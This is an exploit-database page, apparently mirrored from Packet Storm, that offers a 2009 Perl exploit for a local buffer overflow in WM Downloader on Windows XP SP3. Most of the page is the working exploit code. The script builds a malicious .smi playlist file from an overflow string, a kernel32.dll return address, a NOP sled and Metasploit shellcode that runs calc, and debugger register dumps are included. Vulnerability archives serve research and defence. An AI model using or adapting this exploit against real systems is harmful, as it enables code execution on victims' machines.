Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WM Downloader Local Buffer Overflow

🗓️ 24 Aug 2009 00:00:00Reported by the_Edit0rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

WM Downloader Local Buffer Overflow exploit for .Smi, .Ram, .pls, .smil, .wax, .wpl files on Windows XP Pro SP

Code
`#!/usr/bin/perl  
#[+] Bug : WM Downloader (.Smi/ .Ram/ .pls/ .smil/ .wax/ .wpl File) Local Buffer Overflow Exploit  
#[+] Author : the_Edit0r  
# Contact me : the_3dit0r[at]Yahoo[dot]coM  
#[+] Greetz to all my friends  
#[+] Tested on: Windows XP Pro SP3   
#[+] Big thnx: Expl0iters.ir * Anti-security.ir  
#########################################################  
  
#EAX 00000001  
#ECX 41414141  
#EDX 00ED0000  
#EBX 00383E30 ASCII "C:\Documents and Settings\Administrator\Desktop\Edit0r.smi"  
#ESP 000F739C  
#EBP 000FBFB4  
#ESI 77C2FCE0 msvcrt.77C2FCE0  
#EDI 00006619  
#EIP 41414141  
  
##########################################################  
  
my $EIP="http://"."\x41\x41\x41" x 8707;  
my $ret="\x7B\x46\x86\x7c"; # kernel32.dll  
my $nop="\x90" x 20;  
  
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
my $shellcode =  
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".  
"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".  
"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".  
"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".  
"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".  
"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".  
"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".  
"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".  
"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".  
"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";  
  
open(MYFILE,'>>Edit0r.smi');  
print MYFILE $EIP.$ret.$nop.$shellcode;  
close(MYFILE);  
print "File Created successfully\n";  
  
############################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Aug 2009 00:00Current
1.1Low risk
Vulners AI Score1.1
wm downloaderlocal buffer overflow.smi.ram.pls.smil.wax.wplwindows xp pro sp3the_edit0rkernel32.dllbuffer overflow exploitmetasploitmsvcrt.77c2fce0win32_execpexfnstenvsubanti-security.irexpl0iters.ir
22